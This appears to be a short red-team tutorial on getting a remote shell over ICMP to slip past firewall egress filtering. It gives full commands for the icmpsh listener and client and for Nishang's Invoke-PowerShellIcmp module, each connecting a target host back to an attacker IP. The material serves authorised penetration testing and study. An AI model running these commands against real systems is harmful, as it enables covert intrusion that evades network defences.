Most systems in internal networks are behind firewalls and corporate proxies in order to control inbound and outbound Internet traffic. Firewalls can block reverse and bind TCP connections. However ICMP traffic most of the times is permitted. Therefore it is possible to use this protocol as a covert channel in order to obtain a shell and execute commands remotely on a target host.
This is an old technique which was used most of the times in restricted environments to receive a shell but in nowadays with the spread of Red Team engagements it can be used as another method to execute commands by using ICMP traffic and bypass egress filtering.
The following commands will disable all ICMP echo replies which is essential for the tool to work properly and will start a listener which will wait for ICMP packets from the target host:
sysctl -w net.ipv4.icmp_echo_ignore_all=1 ./icmpsh_m.py 192.168.100.3 192.168.100.4
The GitHub repository of the icmpsh tool contains also a binary which needs to be transferred and executed on the target host. The following command will send ICMP traffic to the master host:
icmpsh.exe -t 192.168.100.3
A shell will received over ICMP and commands can be executed through this channel.
There are various other tools that exist online as alternatives to perform command and control over ICMP like PiX-C2.
Nishang framework contains a PowerShell module which can be used in combination with icmpsh python script to obtain a shell over ICMP. On the master host the following command will wait for any incoming ICMP packets.
./icmpsh_m.py 192.168.100.3 192.168.100.4
On the target host the PowerShellIcmp module requires only the master IP address:
Import-Module .\Invoke-PowerShellIcmp.ps1 Invoke-PowerShellIcmp 192.168.100.3
The connection will received from the master host.